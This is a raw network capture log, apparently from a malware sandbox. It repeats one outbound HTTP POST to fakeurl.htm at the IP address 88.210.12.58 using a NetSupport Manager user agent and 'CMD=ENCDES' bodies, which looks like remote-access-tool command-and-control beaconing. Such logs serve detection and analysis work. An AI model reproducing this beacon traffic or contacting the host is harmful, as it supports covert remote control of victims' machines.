Dec 10, 2024 09:00:33.305088043 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:33.405134916 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:33.505091906 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:33.608824968 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:33.706094980 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:33.807085037 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:33.908801079 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:34.008804083 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:34.109169960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:34.209089041 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:34.310096025 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:34.411118031 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:34.512289047 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:34.612144947 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:34.713078976 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:34.814100981 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:34.914159060 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:35.015166998 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:35.116807938 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:35.216272116 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:35.317426920 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:35.418076992 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:35.518078089 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:35.620806932 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:35.720813990 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:35.821202040 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:35.924808025 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:36.022102118 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:36.123111963 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:36.223134041 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:36.324130058 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:36.424098015 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:36.525113106 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:36.625125885 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:36.726097107 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:36.826138973 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:36.927243948 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:37.027093887 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:37.128859043 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:37.228832960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:37.328164101 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:37.429177046 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:37.532826900 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:37.632832050 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:37.731122017 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:37.832818985 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:37.932116985 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:38.032099962 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:38.132164955 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:38.233133078 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:38.333142042 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:38.434096098 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:38.534090996 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:38.634139061 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:38.734131098 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:38.835169077 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:38.936089993 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:39.036166906 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:39.138916969 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:39.236099958 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:39.338890076 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:39.438877106 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:39.537101030 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:39.639045000 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:39.739125967 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:39.843444109 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:39.946816921 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:40.043126106 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:40.144167900 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:40.245146990 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:40.346120119 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:40.446197987 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:40.547116041 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:40.647115946 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:40.748110056 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:40.848104954 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:40.949162960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:41.049226046 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:41.150852919 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:41.254829884 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:41.351129055 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:41.454607010 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:41.554816961 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:41.653110027 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:41.754921913 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:41.854129076 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:41.954113960 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:42.055192947 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:42.156109095 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:42.256151915 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:42.357110977 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:42.457128048 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
Dec 10, 2024 09:00:42.558165073 CET	230	OUT	POST http://88.210.12.58/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 36Host: 88.210.12.58Connection: Keep-AliveCMD=ENCDES=1DATA=#mHUAAg Data Raw: Data Ascii:
